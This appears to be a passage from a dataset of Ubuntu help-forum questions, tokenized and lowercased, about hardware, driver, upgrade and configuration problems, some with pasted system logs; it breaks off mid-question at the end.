187104	interrupted printing	i have a hp deskjet 720c printer plugged into an ubuntu 12.04.1 laptop . when i plugged the printer for the first time , the system found the right model automatically and everything seemed to be fine . but every time i try to print something , the printing process does n't finish , the paper stays in the tray half-way , or just about to finish , failing to print the last few lines of a document , and can only be taken out by switching the printer on and off . the printing job shows as interrupted in the printer menu : any ideas on what might be happening ? the printer was previously working fine on an old 7.10 computer via a 25 pin parallel connection . since then -- and i do n't know if this related to the printing problem -- i bought a usb cable adapter to plug to the laptop , like the one in the picture : this is the output of dmesg : [ 5213.987345 ] usblp0 : usb bidirectional printer dev 4 if 0 alt 1 proto 2 vid 0x067b pid 0x2305 [ 5274.997679 ] usblp0 : removed [ 5522.007297 ] usb 1-1.2 : reset full-speed usb device number 4 using ehci_hcd [ 5561.914953 ] usb 1-1.2 : reset full-speed usb device number 4 using ehci_hcd [ 5681.101749 ] usb 1-1.2 : reset full-speed usb device number 4 using ehci_hcd [ 5782.969411 ] usb 1-1.2 : reset full-speed usb device number 4 using ehci_hcd edit : i checked the margins , and they are as default as the ones recommended in the answer . i changed the bottom margin slightly , but it always missed the bottom part of the page when doing print test page , at about 2cm to the end of the a4 page .
187115	lenovo 3000 n100 wifi not working even after driver update	i have a lenovo 3000n100 which has wifi card/drives that are not working . i have tested the card with windows and it works . tried un-installing the card in 12.04.1 and re-installing it even with a reboot and still no good . can anyone give me some help on this ?
187117	can not upgrade from 11.10 to 12.04	i can not upgrade from 11.10 to 12.04 . the message on the screen is : '' not all updates can be installed '' . and then i click partial upgrade . then the message on the screen is : '' error authenticating some packages '' . then the upgrade fail . i try to upgrade many times but the two message always appear . i still can use 11.10 but always fail upgrade to 12.04 . what should i do ?
187120	how do i install gyachi on ppc ubuntu ?	so i 'm trying to install gyachi on my imac g5 runnig ubuntu 12.04.1 but i ca n't seem to find a package that works on powerpc interface . i did find some powerpc enterprise linux.rpm builds on the internet but i have no idea how to install them . this is the lin : http : //rpmfind.net/linux/rpm/epel/5/ppc/gyachi-1.1.71-5.el5.ppc.html does anyone know how to install that , or would it work ? is there any skype alternative that has both audio and video for ubuntu ? in my knowledge , gyachi is the only one that at least does both audio and video for yahoo .
187122	wireless always disconnects with a broadcom bcm4312	i upgraded my ubuntu 10.10 for ubuntu 12.04 . i have a emachines e625 with ubuntu 12.04 my wireless always disconnects every 10 sec . it did n't do that with 10.10 . here is my config : linux sylvain-emachines-e625 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:54:40 utc 2012 i686 athlon i386 gnu/linux total used free shared buffers cached mem : 1759 1425 333 0 46 925 -/+ buffers/cache : 452 1306 swap : 1788 0 1788 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 05:00.0 ethernet controller : atheros communications inc. ar8132 fast ethernet ( rev c0 ) i will really enjoy an answer to solve this problem . thank you in advance ! silas
187125	wireless cuts out on toshiba satellite s7208	i recently got a toshiba satellite l875-s7208 with windows 7 preinstalled . i installed ubuntu 12.04 lts dual boot to the same windows partition . however , usually 15 minutes or less after booting , the wifi connection dies . here 's some hopefully relevant information : lspci -knn 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) subsystem : toshiba america info systems device [ 1179 : fb41 ] kernel driver in use : agpgart-intel 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) subsystem : toshiba america info systems device [ 1179 : fb40 ] kernel driver in use : i915 kernel modules : i915 00:14.0 usb controller [ 0c03 ] : intel corporation panther point usb xhci host controller [ 8086:1e31 ] ( rev 04 ) subsystem : toshiba america info systems device [ 1179 : fb41 ] kernel driver in use : xhci_hcd 00:16.0 communication controller [ 0780 ] : intel corporation panther point mei controller # 1 [ 8086:1e3a ] ( rev 04 ) subsystem : toshiba america info systems device [ 1179 : fb41 ] kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) subsystem : toshiba america info systems device [ 1179 : fb41 ] kernel driver in use : ehci_hcd 00:1b.0 audio device [ 0403 ] : intel corporation panther point high definition audio controller [ 8086:1e20 ] ( rev 04 ) subsystem : toshiba america info systems device [ 1179 : fb40 ] kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge [ 0604 ] : intel corporation panther point pci express root port 1 [ 8086:1e10 ] ( rev c4 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge [ 0604 ] : intel corporation panther point pci express root port 2 [ 8086:1e12 ] ( rev c4 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge [ 0604 ] : intel corporation panther point pci express root port 3 [ 8086:1e14 ] ( rev c4 ) kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) subsystem : toshiba america info systems device [ 1179 : fb41 ] kernel driver in use : ehci_hcd 00:1f.0 isa bridge [ 0601 ] : intel corporation panther point lpc controller [ 8086:1e59 ] ( rev 04 ) subsystem : toshiba america info systems device [ 1179 : fb41 ] kernel modules : itco_wdt 00:1f.2 sata controller [ 0106 ] : intel corporation panther point 6 port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) subsystem : toshiba america info systems device [ 1179 : fb41 ] kernel driver in use : ahci 00:1f.3 smbus [ 0c05 ] : intel corporation panther point smbus controller [ 8086:1e22 ] ( rev 04 ) subsystem : toshiba america info systems device [ 1179 : fb41 ] kernel modules : i2c-i801 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:8211 ] kernel driver in use : rtl8192ce kernel modules : rtl8192ce 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : toshiba america info systems device [ 1179 : fb37 ] kernel driver in use : r8169 kernel modules : r8169 lsmod module size used by snd_hda_codec_hdmi 32474 1 snd_hda_codec_realtek 224066 1 joydev 17693 0 rfcomm 47604 0 bnep 18281 2 bluetooth 180104 10 rfcomm , bnep parport_pc 32866 0 ppdev 17113 0 arc4 12529 2 snd_hda_intel 33773 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq psmouse 87692 0 serio_raw 13211 0 rtl8192ce 84826 0 rtl8192c_common 75767 1 rtl8192ce rtlwifi 111202 1 rtl8192ce mac80211 506816 3 rtl8192ce , rtl8192c_common , rtlwifi snd 78855 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device sparse_keymap 13890 0 uvcvideo 72627 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev mac_hid 13253 0 mei 41616 0 wmi 19256 0 soundcore 15091 1 snd i915 472941 3 snd_page_alloc 18529 2 snd_hda_intel , snd_pcm drm_kms_helper 46978 1 i915 cfg80211 205544 2 rtlwifi , mac80211 drm 242038 4 i915 , drm_kms_helper i2c_algo_bit 13423 1 i915 video 19596 1 i915 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp r8169 62099 0 ums_realtek 18248 0 uas 18180 0 usb_storage 49198 1 ums_realtek dmesg | grep firmware [ 15.692951 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 16.240881 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 452.419288 ] rtl8192c_common : rtl92c_firmware_selfreset ( ) : 8051 reset fail . [ 458.572211 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 465.440640 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 472.337617 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 479.175471 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 485.978582 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 492.764893 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 499.579348 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 506.386934 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 513.209545 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 519.991365 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 526.778375 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 533.629695 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 540.426004 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 547.238125 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 554.024434 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 560.854794 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 567.678160 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 574.494666 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 581.336653 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 588.157710 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 595.221122 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 602.047429 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 608.829534 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 615.639079 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 622.454991 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 629.273231 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 636.056613 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 642.858096 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 649.640753 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 657.184094 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 664.008018 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 670.838639 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 677.675418 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 684.507255 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 691.310994 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 698.095325 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 704.914509 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin [ 711.725178 ] rtl8192c_common : loading firmware file rtlwifi/rtl8192cfw.bin uname -r 3.2.0-29-generic ifconfig eth0 link encap : ethernet hwaddr 4c:72 : b9:59:6c:61 inet addr:192.168.0.11 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :4e72 : b9ff : fe59:6c61/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4447 errors:0 dropped:0 overruns:0 frame:0 tx packets:2762 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3671147 ( 3.6 mb ) tx bytes:335133 ( 335.1 kb ) interrupt:42 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:515 errors:0 dropped:0 overruns:0 frame:0 tx packets:515 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:83153 ( 83.1 kb ) tx bytes:83153 ( 83.1 kb ) wlan0 link encap : ethernet hwaddr 74 : e5:43:32:47:95 up broadcast multicast mtu:1500 metric:1 rx packets:280 errors:0 dropped:0 overruns:0 frame:0 tx packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:32958 ( 32.9 kb ) tx bytes:10431 ( 10.4 kb )
187126	how can i update my custom repository ?	i created a local repository and i used it in my ubuntu clients . this repository contains only some packages . now i would upgrade these packages . how can i do it , as there are many packages and update them all manually is very difficult ? have you got some suggestions to give me ?
187131	ubuntu 12.04 disc mounting issues	i recently upgraded to ubuntu 12.04 from 10.04 . my laptop has two hard disks and when i mount the second disk , i no longer have any control over the file permissions ( even in su mode ) . so none of the software i have installed on that disk works anymore . how do i fix this ?
187134	how do i `` sync '' read/unread with thunderbird and hotmail	after a fresh install of 12.04 , i 'm trying to use thunderbird for the first time , instead of a web browser ( first of all , is it better and/or safer ? ) . i noticed that , at least for hotmail , read emails are n't synchronized and remain unread in thunderbird if i read them in hotmail , and reciprocally . is there a way to change that ?
187138	unity window launcher	what is the easiest way to make unity 3d reduce an application if the icon is clicked upon in the launcher and the window is already on top ? as far as i know , in such a case , clicking does n't do anything . if it does do something that i 'm unaware of , please do explain it to me , maybe it 's a feature i am interested in but just have n't noticed .
187144	is dell inspiron 15r special edition compatible with ubuntu ?	i want to buy a dell inspiron 15r special edition . on ubuntu.com , it says that dell inspiron 15r will work properly . but the special edition has some special issues . i will list the hardware : 3rd generation intel® core™ i7-3612qm processor ( 6m cache , up to 3.1 ghz ) 15.6 '' full high definition ( 1080p ) led display 8gb2 dual channel ddr3 sdram at 1600mhz 750gb 7200 rpm sata hard drive 8x tray load cd/dvd burner ( dual layer dvd+/-r drive ) amd radeon™ hd 7730m 2gb built-in skullcandy™ stereo speakers and waves maxxaudio® 4 technology will it have any problem ?
187146	better than virtualbox	i installed ubuntu with a virtualbox on my mac . but the more i use ubuntu , the more i install package , the more it becomes very slow to launch on my virtualbox . by the way , it makes slow all the apps running on my mac . is there any other virtual environment more efficient than virtualbox ?
187147	file transfer indicator applet ?	in gnome-shell when you do a file transfer you get a icon appear in the bar at the top , i know in unity it shows you the information in the unity launcher , but i have that set to autohide , so i was wondering if there was a indicator that added the icon the the top panel bar like gnome-shell does ?
187148	how do i get .xcf files to open in gimp instead of inkscape by default ?	for some reason , whenever i double-click a .xcf file in nautilus or open it from the dash , the file tries to load in inkscape ( with an error message ) instead of in gimp by default . i have both applications installed and i am using ubuntu 12.04 lts . how do i get these files to open in gimp by default instead ?
187152	how do i enable shmconfig ?	i do n't know how to enable shmconfig on ubuntu 12.04 so that i can run synclient -m 100 correctly . i searched and solutions were with hal daemon , but i do n't have hal , i think it was deprecated . thanks
187155	can i install nuvola beta version on ubuntu 12.10	i had installed nuvola music player on 12.04 but on 12.10 i could not install it so is there a way to install nuvola beta version on ubuntu 12.10 if so how : ) thank you for your time
187156	how to change low process priority ?	i have just set ubuntu 12.04 64bit with cinnamon desktop and 3.5.0-030500 kernel on my new laptop with ivybridge i7 . i decided to test its performance by running a single threaded cpu-hungry program that i often use for camera calibration . unfortunately , it ended up running much slower than i have ever expected . after some investigation it turned out that the program priority is automatically changed from normal to low which makes the program even slower . i have also noticed that all user programs such as skype and firefox are set to low priority . i tried manually resetting the priority to normal or even very high using the renice command , which works temporary until the kernel scheduler ( i guess ) resets the priority to low . is this a normal behaviour and how can i overcome the slow execution problem ? p.s . i also tried with the 3.2 kernel , but the problem is still present .
187164	sound mute-ing on every thing i try	the sound on this machine worked pretty well until a few days ago ( okay , so sound is not the very most important thing to me , but , the lack of it is getting old ) . when i click the speaker icon it always says `` mute '' , when i set it to `` unmute '' the slider goes to zero . when i move the slider off of zero , the status goes to `` mute '' . so , does anyone know what 's going on with my system ?
187165	bash script to remove line breaks ?	i need a script that inputs a file and echos its contents with linebreaks removed - `` word wrapped '' so to speak . i 've tried : # ! /bin/bash find $ home ' $ 1 ' | while read line ; do echo `` $ { line } '' ; done but it just returns nothing .
187179	where is my cd/dvd drive ?	i have tried half a dozen file managers trying to find one that 's usable for a same person , and have not yet seen one that recognized the dvd drive on my dual-boot ( orig win7 ) machine .
187183	making a partition with gparted - unmount ?	i need to create some space to that i can dual-boot with windows . looking at gparted , it seems that to do that , i need to unmount my /dev/sda1 which contains my ubuntu system . while searching online , it seems that people were doing it for removable media , but i 'm working with one hard drive . is it safe to unmount to create some space ?
187185	can i upgrade from 32-bit to 64-bit ?	i have a 64-bit processor ( intel i3 second gen ) , and when i installed ubuntu i went with the 32-bit version because i was just testing it , but now i see it is a lot better than win7 and want to upgrade to the 64-bit version . is there any way to do this without reinstalling ? thanks for the help !
187187	got back hibernation option , but can not resume from hibernate	in my ubuntu 12.04 , the hibernation option was working well and fine . however , i installed debian on another partition recently and when i again tried to boot to ubuntu , i got a message on the boot splash screen saying : the disk drive for / is not ready yet or not present . continue to wait ; or press s to skip mounting or m for manual recovery . after logging into ubuntu , i find that my hibernation option has gone missing . is there anyway to recover the hibernation option ? edit : i solved the disk drive problem and i got the hibernation option back . when i did `` sudo pm-hibernate '' , my system went to hibernation . however , when powering on again , it booted up normally and thus there was no effect of hibernation . how can this be rectified ? edit1 : system - lenovo ideapad s10-2 . edit2 : /etc/fstab edit3 : screenshot of my hard disk .
187191	can i do android development in ubuntu without eclipse ?	i encountered some issues getting started with android development on ubuntu . installing the jdk was painful , and the eclipse gui is not that intuitive . despite these setbacks i 'm still interested and would like to know what other tools are available to me when working with android . what tools in the android sdk keep me locked into eclipse ? is there a way to run these tools without using the gui ?
187192	i can not login into any ttys	my system is ubuntu 11.10 ( installed from 0 , without upgrades/updates ) . when i enter into any tty ( 1 , 2 , 3.. ) it ask me my login name and password but i can not move forward . when i enter an user without password or the root ( i have enabled the account ) the prompt show me this : module is unknown what is this ? why it is happening ? there is n't any way to fix ? note : my boot stop when cheking battery state [ ok ] so i can not go to the gui . i did never use any tty but now i am forced to do so . the auth.log file : top 10 lines : sep 9 20:09:01 m68mt-s2p cron [ 2749 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) sep 9 20:09:01 m68mt-s2p cron [ 2749 ] : pam_unix ( cron : session ) : session closed for user root sep 9 20:17:01 m68mt-s2p cron [ 2821 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) sep 9 20:17:01 m68mt-s2p cron [ 2821 ] : pam_unix ( cron : session ) : session closed for user root sep 9 20:39:01 m68mt-s2p cron [ 2961 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) sep 9 20:39:01 m68mt-s2p cron [ 2961 ] : pam_unix ( cron : session ) : session closed for user root sep 9 20:50:36 m68mt-s2p sudo : lucio : tty=pts/0 ; pwd=/home/lucio ; user=root ; command=/usr/bin/apt-get update sep 9 20:52:42 m68mt-s2p polkitd ( authority=local ) : operator of unix-session : /org/freedesktop/consolekit/session2 successfully authenticated as unix-user : lucio to gain temporary authorization for action org.debian.apt.install-or-remove-packages for system-bus-name : :1.71 [ /usr/bin/python /usr/bin/update-manager -- no-focus-on-map ] ( owned by unix-user : lucio ) last 3 lines ( last attempt to access through tty ) : oct 1 00:27:53 m68mt-s2p login [ 1429 ] : pam unable to dlopen ( /lib/security/pam_access.so ) : /lib/security/pam_access.so : can not open shared object file : no such file or directory oct 1 00:27:53 m68mt-s2p login [ 1429 ] : pam adding faulty module : /lib/security/pam_access.so oct 1 00:27:53 m68mt-s2p login [ 1429 ] : module is unknown the complete auth.log file here .
187195	why is my wireless significantly slower on ubuntu 12.04 , as compared to windows 7 ?	i 'm dual booting 12.04 , and win7 . just a tiny bit of background , i 'm starting to get more and more interested in programming and 3d modelling , so i 'd like to learn more about ubuntu as a result of those interests . still a complete newb though ! anyway , when downloading on windows , i get 1.5mb/s easy . now i swap over to ubuntu , and it has n't topped 150 kb/s since i installed it some 6 months ago . i 'd downloaded most of my programs on windows , so i never really noticed it , but as i 'm committing to ubuntu more , it 's starting to hinder me . i 'm with shaw , on their highspeed 20 , which gives me 20 mbps down , and 6mbps up . speedtest.com shows me varying figures somewhat close to what shaw says they give on both windows and ubuntu , which is to be expected , given that it is shaw afterall ... so , i do n't know what you guys need to know , and i know even less about how to get it to you . whatever information you guys need , tell me how to get it , how to get it up here , and i 'll get it on here ! i thought it might be that i 'm using a proprietary driver , when an open sourced one would work better ? but i really have no clue . any help would be very much appreciated . thanks guys !
187201	package appears in software center but is not installable	i am testing 12.04.1 64 bit and tried to install the teamspeak package via software center : after clicking on `` more info '' since the `` install '' button was not there i got the following : after doing a bit of more search , in synaptic i found that the package does appear but it mentions it is for 32 bit only : so why does it show on software center in the first place if it is only for 32 bit .
187202	bluetooth adapter not recognized on a dell inspiron m5010	ubuntu is not recognising my bluetooth adapter in my laptop ( dell inspiron m5010 ) it has a bluetooth adapter built into the motherboard . i have tried reinstalling bluez , but that has just made my bluetooth settings menu disappear . it is not soft or hard blocked .
187204	live usb doesnt recognize any bootable file on usb . booting from usb gives disc error	windows is screwed up and i can not register it on my computer ( product on hd does n't match product previously on motherboard ) . so i decided to just run ubuntu instead . i put the ubuntu .iso file i downloaded off this site on a usb and tried to boot it from there but is gave me a disc error and never showed ubuntu as an option . i must be doing something wrong . it probably is n't as simple as im hoping
187206	ca n't install oracle j2ee due to `` an internal error has occurred ''	i am trying to install oracle javaee 6 sdk with glassfish on ubuntu 12.04 with java sdk 7 . i have downloaded java_ee_sdk-6u4-jdk7-linux-x64.sh already , but when i run it on terminal , the wizard appears , and after few steps , i get an error message dialog : an internal error has occurred . please contact your system administrator ... null . and , the terminal is showing something like warning : could not process a navigation event for command=ac_next [ command=ac_next error=null ] what can i do ? how can i install j2ee/glassfish under linux x64 ?
187210	12.04 disabling keyboard and mouse	i 'm actually new to ubuntu and i 've just installed a fresh copy of 12.04 , i 'm a convert from windows because i 'm just tired with all the backdoor activities . you could say i 'm a new convert , but i 'm getting frustrated with this freezing of keyboard and mouse , i have no idea what is causing this action , unfortunately i am not in a position yet to provide accurate description of what is going on , i am hoping an expert can help me out with this issue . i have tried rebooting but the problem is becoming persistent each time i reboot , a little advice will help me greatly . nb while typing this the desktop has just gone to sleep i ca n't reboot as both keyboard and mouse are not responding .
187212	remap a mouse button to act as control key	i have the logitech darkfeild mouse ( the one that works on glass ) and was wondering how i can remap one of my currently unused buttons ( my zoom button ) to function as a selected keyboard button ( control or supper ) ? ... .i am also using 13.04 ... . fyi . thanks
187214	kernel panic - not syncing : attempted to kill init !	yes this problem might have been reported and solved for a lot of people on the internet but i have n't found anyone who is running their ubuntu 12.04 from a usb drive . i crashed my hard disk a long time ago and now am running ubuntu from a usb drive since a few months . i have rebooted and booted a lot of times . i had to update the source file because i could not open software center , i have restarted after that as well . now am facing this error : kernel panic - not syncing : attempted to kill init ! ' panic occurred , switching back to text console ' and a lot of other text and error before that . i recently ran a few softwares on wine but did n't work ( i think that might have to do something with the error ) . please let me know what i can do . i have a few important documents on the drive but i can not copy them from the usb because well i do n't know where on earth it stores it . i even tried searching the file names but it did not work . please look at the photo for the errors .
187227	i run `sudo apt-get remove python2.7` , can i restore my ubuntu now ?	i wanted to remove and reinstall python2.7 interpreter on 12.04 but when i did sudo apt-get remove python2.7 , the crazy terminal started to remove everything ! ! ! any idea how i can restore whatever i 've removed ?
187233	how do i share storage while dual-booting mac os x and ubuntu 12.04.1 ?	so i have ubuntu 12.04.1 installed alongside mac os x 10.4.11 on my imac g5 with powerpc architecture . i only have one internal hard drive and i created a small 5 gb partition on it and formatted it to fat32 with gparted in linux , but os x wo n't recognize it , disk utility sees it as mere empty space . i also tried to format it as ntfs and install ntfs-3g on mac os x as a plugin toread and write to ntfs but the same thing happens , the partition is seenas mere empty space and thus ca n't be mounted . i ca n't even partition anything from disk utility because it says that this disk drive is the startup boot drive . any ideas ?
187237	desktop integration with file manager	i use kde as my primary desktop environment . i also have gnome and xfce installed along side . as a result ( i think ) , different applications use different file manager for desktop integration . dropbox uses nautilus . ubuntu one uses nautilus . firefox uses thunar ( when you click on the downloads to show the directory ) . how do i make them use dolphin instead ?
187243	how to mount a samba share at boot time ?	how to add samba share to fstab to ensure mounting at boot time ?
187249	installed ubuntu and lost access to windows	i installed it by using a load of unallocated space on a completely separate hard drive than the one windows is installed to . when i choose windows on the boot menu i get this : 'invalid efi path' any idea why this is ? edit : here is information from boot info script . http : //paste.ubuntu.com/1202156/ i think it might be because i have more than 4 partitions on the drive ? although i am not sure what the one labelled as 'unknown ' is at all .
187251	udev webcam rule read , but not respected ?	i have two usb-webcams on them machine , but at boot they sometimes switch /dev/video number . the solution to this problem seems to be creating a new udev rule . i have added this rule in/etc/udev/rules.d/jj-video.rules : fix webcam 1 kernel== '' video1 '' , subsystem== '' video4linux '' , subsystems== '' usb '' , attrs { idvendor } == '' 1d6b '' , attrs { idproduct } == '' 0001 '' , symlink+= '' webcam1 '' fix webcam 2 kernel== '' video2 '' , subsystem== '' video4linux '' , attr { name } == '' logitech quickcam pro 3000 '' , kernels== '' 0000:00:1d.0 '' , subsystems== '' pci '' , drivers== '' uhci_hcd '' , attrs { vendor } == '' 0x8086 '' , attrs # # { device } == '' 0x2658 '' , symlink+= '' webcam2 '' but the webcam symlinks are not created . i have tried many different combinations in this file . the present ones are just my latest attempts . i found the parameters in : jjk @ eee-old : ~ $ udevadm info -a -p $ ( udevadm info -q path -p /class/video4linux/video1 ) udevadm info starts with the device specified by the devpath and then walks up the chain of parent devices . it prints for every device found , all possible attributes in the udev rules key format . a rule to match , can be composed by the attributes of the device and the attributes from one single parent device . looking at device '/devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0/video4linux/video1 ' : kernel== '' video1 '' subsystem== '' video4linux '' driver== '' '' attr { name } == '' logitech quickcam pro 3000 '' attr { index } == '' 0 '' attr { button } == '' 0 '' looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0 ' : kernels== '' 2-2:1.0 '' subsystems== '' usb '' drivers== '' philips webcam '' attrs { binterfacenumber } == '' 00 '' attrs { balternatesetting } == '' 9 '' attrs { bnumendpoints } == '' 02 '' attrs { binterfaceclass } == '' 0a '' attrs { binterfacesubclass } == '' ff '' attrs { binterfaceprotocol } == '' 00 '' attrs { supports_autosuspend } == '' 0 '' looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2/2-2 ' : kernels== '' 2-2 '' subsystems== '' usb '' drivers== '' usb '' attrs { configuration } == '' '' attrs { bnuminterfaces } == '' 3 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmattributes } == '' a0 '' attrs { bmaxpower } == '' 500ma '' attrs { urbnum } == '' 371076 '' attrs { idvendor } == '' 046d '' attrs { idproduct } == '' 08b0 '' attrs { bcddevice } == '' 0002 '' attrs { bdeviceclass } == '' 00 '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { bnumconfigurations } == '' 1 '' attrs { bmaxpacketsize0 } == '' 8 '' attrs { speed } == '' 12 '' attrs { busnum } == '' 2 '' attrs { devnum } == '' 2 '' attrs { devpath } == '' 2 '' attrs { version } == '' 1.10 '' attrs { maxchild } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { authorized } == '' 1 '' attrs { serial } == '' 01402100a5000000 '' looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2 ' : kernels== '' usb2 '' subsystems== '' usb '' drivers== '' usb '' attrs { configuration } == '' '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bmaxpower } == '' 0ma '' attrs { urbnum } == '' 34 '' attrs { idvendor } == '' 1d6b '' attrs { idproduct } == '' 0001 '' attrs { bcddevice } == '' 0302 '' attrs { bdeviceclass } == '' 09 '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { bnumconfigurations } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { speed } == '' 12 '' attrs { busnum } == '' 2 '' attrs { devnum } == '' 1 '' attrs { devpath } == '' 0 '' attrs { version } == '' 1.10 '' attrs { maxchild } == '' 2 '' attrs { quirks } == '' 0x0 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { authorized } == '' 1 '' attrs { manufacturer } == '' linux 3.2.0-29-generic uhci_hcd '' attrs { product } == '' uhci host controller '' attrs { serial } == '' 0000:00:1d.0 '' attrs { authorized_default } == '' 1 '' looking at parent device '/devices/pci0000:00/0000:00:1d.0 ' : kernels== '' 0000:00:1d.0 '' subsystems== '' pci '' drivers== '' uhci_hcd '' attrs { vendor } == '' 0x8086 '' attrs { device } == '' 0x2658 '' attrs { subsystem_vendor } == '' 0x1043 '' attrs { subsystem_device } == '' 0x82d8 '' attrs { class } == '' 0x0c0300 '' attrs { irq } == '' 23 '' attrs { local_cpus } == '' ff '' attrs { local_cpulist } == '' 0-7 '' attrs { dma_mask_bits } == '' 32 '' attrs { consistent_dma_mask_bits } == '' 32 '' attrs { broken_parity_status } == '' 0 '' attrs { msi_bus } == '' '' looking at parent device '/devices/pci0000:00 ' : kernels== '' pci0000:00 '' subsystems== '' '' drivers== '' '' jjk @ eee-old : ~ $ and tested the setup : sudo udevadm -- debug test /sys/class/video4linux/video1 main : runtime dir '/run/udev' run_command : calling : test adm_test : version 175 this program is 